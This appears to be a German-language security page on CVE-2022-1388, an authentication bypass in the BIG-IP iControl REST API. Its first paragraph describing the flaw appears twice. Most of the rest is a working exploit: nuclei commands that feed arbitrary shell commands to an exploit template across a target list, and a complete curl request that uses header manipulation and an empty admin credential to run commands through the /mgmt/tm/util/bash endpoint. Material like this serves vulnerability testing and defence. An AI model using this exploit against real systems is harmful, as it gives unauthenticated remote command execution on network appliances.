
CVE-2022-1388 ist eine Schwachstelle zur Umgehung der Authentifizierung in der REST-Komponente der iControl-API von BIG-IP, der ein CVSSv3-Score von 9.8 zugewiesen wurde. Die iControl-REST-API wird für die Verwaltung und Konfiguration von BIG-IP-Geräten verwendet. CVE-2022-1388 könnte von einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf den Verwaltungsport oder die Self-IP-Adressen von Geräten, die BIG-IP verwenden, ausgenutzt werden. Eine Ausnutzung würde es dem Angreifer ermöglichen, beliebige Systembefehle auszuführen, Dateien zu erstellen und zu löschen sowie Dienste zu deaktivieren.
CVE-2022-1388 ist eine Authentifizierungsumgehungs-Schwachstelle in der REST-Komponente der iControl-API von BIG-IP, der ein CVSSv3-Score von 9,8 zugewiesen wurde. Die iControl REST API wird für die Verwaltung und Konfiguration von BIG-IP-Geräten verwendet. CVE-2022-1388 könnte von einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf den Verwaltungsport oder die Selbst-IP-Adressen von Geräten, die BIG-IP verwenden, ausgenutzt werden. Eine Ausnutzung würde es dem Angreifer ermöglichen, beliebige Systembefehle auszuführen, Dateien zu erstellen und zu löschen sowie Dienste zu deaktivieren.
Diese nuclei-Vorlage akzeptiert Shell-Parameter zur Ausnutzung. Wir wollten Tokens testen, die aus einem anderen Workflow oder einer manuellen Suche stammen, und haben daher die CLI-Variablenfunktion von nuclei verwendet, um zur Laufzeit dynamisch einen einzelnen Token-Wert oder eine Liste von Tokens in diese Vorlagen einzuspeisen.
-V, -var value benutzerdefinierte Variablen im Format var=value
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'